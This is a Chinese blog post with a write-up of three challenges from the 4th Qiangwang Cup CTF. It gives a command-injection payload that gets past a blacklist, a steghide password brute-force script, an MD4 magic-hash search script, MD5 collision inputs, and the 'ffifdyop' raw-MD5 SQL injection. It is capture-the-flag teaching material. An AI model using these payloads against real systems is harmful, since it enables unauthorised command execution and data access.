第四届强网杯强网先锋的部分write up

最新推荐文章于 2024-05-01 23:28:30 发布
最新推荐文章于 2024-05-01 23:28:30 发布
阅读量458 收藏
点赞数
分类专栏: CTF web安全 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuaicenglou3032/article/details/108172758
版权

1、《主动》:

打开看到代码:

 <?php
highlight_file("index.php");

if(preg_match("/flag/i", $_GET["ip"]))
{
    die("no flag");
}

system("ping -c 3 $_GET[ip]");

?>

这是命令执行,试了试可以执行ls命令:

http://39.96.23.228:10002/index.php?ip=;ls

但是过滤了cat vi vim和"flag"关键字,

因此构造payload,拼接绕过黑名单:

http://39.96.23.228:10002/index.php?ip=;a=fl;b=ag.php;tac%20$a$b

cat用不了,试了试倒着输出文件的tac,成功拿到flag:

还有其他绕过骚操作看这里:CTF下的命令执行漏洞利用及绕过方法总结

2.《upload》

下载下来是一个pcapng,用wireshark打开它。

这道题比较简单,我们可以分离出来一个jpg和一个html。

html代码如下,内有提示:

注释那里,他说他用steghide隐藏了一些东西。

然后我们看分离出来的这张jpg:

我们在ubuntu中使用命令sudo apt install steghide安装好steghide。

虽然我不知道它密码是多少,但我首先盲猜是123456:

成功了,打开就看到了flag:

其实这里如果不是123456的话就要自己准备字典进行爆破,下面给出大佬的bash爆破脚本:

#bruteStegHide.sh 
#!/bin/bash

for line in `cat $2`;do
    steghide extract -sf $1 -p $line > /dev/null 2>&1
    if [[ $? -eq 0 ]];then
        echo 'password is: '$line
        exit
    fi  
done 


用法:
# ./bruteStegHide.sh test.jpg passwd.txt


原文:https://blog.csdn.net/Blood_Seeker/article/details/81837571

3.《funhash》

代码:

<?php
include 'conn.php';
highlight_file("index.php");
//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
    die('level 1 failed');
}

//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
    die('level 2 failed');
}

//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc(); 
var_dump($row);
$result->free();
$mysqli->close();


?>

共三关。

第一关是比较少见的MD4,看要求是找到一个md4值与自身相同的值,根据php的弱类型比较!=,我估计是从0E开头的数字里面找,这里上一个国外大佬的python脚本:

import hashlib
import Crypto.Hash.MD4
import re
prefix = '0e'
def breakit():
    iters = 0
    while 1:
        s  = (prefix + str(iters)).encode('utf-8')
        hashed_s = hashlib.new('md4', s).hexdigest()
        iters = iters + 1
        r = re.match('^0e[0-9]{30}', hashed_s)
        if r:
            print ("[+] found! md4( {} ) ---> {}".format(s, hashed_s))
            print ("[+] in {} iterations".format(iters))
            exit(0)
        if iters % 1000000 == 0:
            print ("[+] current value: {}       {} iterations, continue...".format(s, iters))
breakit()

执行之后找出来该值是:0e251288019,其md4摘要为:0e874956163641961271069404332409。

拿下第一关。

现在来看第二关,第二关要求是hash2不能等于hash3且为强比较,然后hash2和hash3的MD5值必须相等,这个就很多了。

hash2=
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2


hash3=
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

这两个是已经urlencode好的了参数
原文:https://blog.csdn.net/qq_19980431/article/details/83018232

拿下第二关,当然,也可以使用数组的方式:hash2[]=1&hash3[]=2,这个更为简洁。

然后第三关是SQL注入与hash结合的类型。

构造hash4=ffifdyop,具体原因看这篇:https://blog.csdn.net/CLarali0/article/details/83590345

然后拿到flag:

--------------end---------------

KogRow(接毕设和大作业版)
关注
专栏目录
第三届强网杯线上赛记录
T19er的博客
07-02 1367
** Misc 0x01 签到** flag{welcome_to_qwb_2019} 0x02 强网先锋-打野 解压出来是一个bmp文件 打开图片 又是cxk。。。 首先想到的是丢尽Stegsolve分析一波,感觉是lsb隐写,但看不出有什么端倪。 但能够确定的是隐写题目,于是百度一波,发现zsteg是一个可以检测png和bmp文件中隐藏数据的工具,于是安装zsteg分析一波。竟然发现了...
2019强网杯部分writeup
Sea_Sand息禅
06-04 5601
Web 1、UPLOAD 复现环境https://github.com/CTFTraining/qwb_2019_upload 先看一下网站情况: 是一个注册可登录的界面,登陆之后可以上传图片,一个账号只能上传一次。 扫一下后台目录,发现upload是泄露的,www.tar.gz是泄露的。 www.tar.gz下载下来是网站的源码,upload则是我们上传的文件,找到上传文件的源码: &lt...
2021 强网杯 [强网先锋]orw
z1r0的博客
07-13 524
开了沙盒,利用orw来读flag 没有对index做出限制,可以进行oob。并且当size为0时,可以无限溢出 往heap_ptr的上面找一下,看一下哪个got表可以被轻松利用。 发现了三个常用的got表,因为提供了free功能,所以就直接oob到free的got表,改free为orw即可。 (2020E0 - 0x202018)/ 8 = 25 exp如下...
2020强网杯部分题目复现
m0re's blog
08-27 2537
title: 强网杯赛后总结 tags: CTF 强网先锋 Funhash <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { die('level 1 failed'); } //level 2 if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['ha.
[SWPUCTF 2021 新生赛]jicao
最新发布
m0_74759151的博客
05-01 1205
[SWPUCTF 2021 新生赛]jicao
第四届强网杯】主动
../../../../../../../
08-24 1383
注意⚠️此题是“命令执行绕过”,不是“代码执行绕过” 下发题目打开,拿到源码 <?php highlight_file("index.php"); if(preg_match("/flag/i", $_GET["ip"])) { die("no flag"); } system("ping -c 3 $_GET[ip]"); ?> 传入的参数如果匹配到了flag字符就输出“no flag” 测试一下,发现flag.php就在当前目录 如果要输出flag.php的内容,我们要
2021第五届强网杯部分writewp
zji
06-14 1190
第五届强网杯部分题解 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录第五届强网杯部分题解前言一、Web1.1Web1 [强网先锋]寻宝操作过程二、MISC2.读入数据三、PWN 前言 提示:这里不是我一个人打出来的,一个团队,然后可能有些写得不是很清楚,望见谅。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Web 1.1Web1 [强网
【天格】战队-已解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中展现出卓越的技能和深入的理解,这是一场集技术、策略与团队协作于一体的顶级赛事。挑战赛中的解题附件揭示了网络安全领域的多个关键知识点,涵盖了逆向工程、...
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
2018强网杯CTF-题目整理-校本图片Readme.zip
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
【技术分享】用图片讲一个故事——第五届强网杯Threebody题目官方题解 .pdf
09-05
【技术分享】这篇内容主要围绕的是第五届强网杯网络安全竞赛中的一个题目——"Threebody",这是一道涉及图像隐写术和信息安全挑战的问题。题目通过一张图片来讲述故事,测试参赛者的安全分析和漏洞分析能力。以下是...
2019 第三届强网杯线上赛.zip
12-17
强网杯
preg_match函数绕过
weixin_42478365的博客
10-10 7515
<?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if(preg_match("/[A-Za-z0-9_$@]+/",$code)){ die('fighting!'); } eval($code); } 1.绕过数字和字母 首先,我们常见的CTF题代码如下,主要是绕过数字和字
【2020第四届强网杯“全国网络安全挑战赛】强网先锋 Funhash
weixin_45844670的博客
08-24 1179
题目链接:http://39.101.177.96/ <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { die('level 1 failed'); } //level 2 if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5(
PHP中MD5函数漏洞
05-07 713
题目描述 一个网页,不妨设URL为http://haha.com,打开之后是这样的 if (isset($_GET['a']) and isset($_GET['b'])) { if ($_GET['a'] != $_GET['b']) { if (md5($_GET['a']) === md5($_GET['b'])) { echo ('...
<?php highlight_file('index.php'); include("flag.php"); $id=$_POST['id']; $json=json_decode($_GET['j...
weixin_35750953的博客
02-16 346
这是一段 PHP 代码。这段代码会显示文件 "index.php" 的内容,并包含文件 "flag.php"。它还会将 POST 请求中的 "id" 参数赋值给变量 $id,并将 GET 请求中的 "json" 参数解码为数组并赋值给变量 $json。如果 $id 等于 "wllmNB",则会执行下一个 if 语句。 ...
2019第三届强网杯-强网先锋-ADwp
or1d1的博客
05-27 5134
周末参加了一下强网杯,emmm这些题目不是我等弟弟所能解答的。 鲲or鳗orGame题目wphttps://blog.csdn.net/or1d1/article/details/90599659 其他大佬的wp https://skysec.top/2019/05/25/2019-%E5%BC%BA%E7%BD%91%E6%9D%AFonline-Web-Writeup/#uploa...
ctfshow—PHP特性
cosmoslin的博客
09-14 2296
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
BUUCTF笔记之Web系列部分WriteUp(四)
热门推荐
克格莫(有需要的私信)
06-24 2万+
1.[BJDCTF2020]Mark loves cat dirb扫描目录发现.git泄露。 githack获取源码 <?php $flag = file_get_contents('/flag'); //HTML代码太多了,人工删除 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($
第二届强网杯网络安全挑战赛Writeup
"这篇资源是关于第二届强网杯全国网络安全挑战赛的Writeup,涵盖了多个关卡的解题策略和技巧。" 在本次网络安全挑战赛中,参赛者需要解决一系列网络安全问题,这些问题涉及到图像隐写术、密码学、程序逆向工程以及...
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值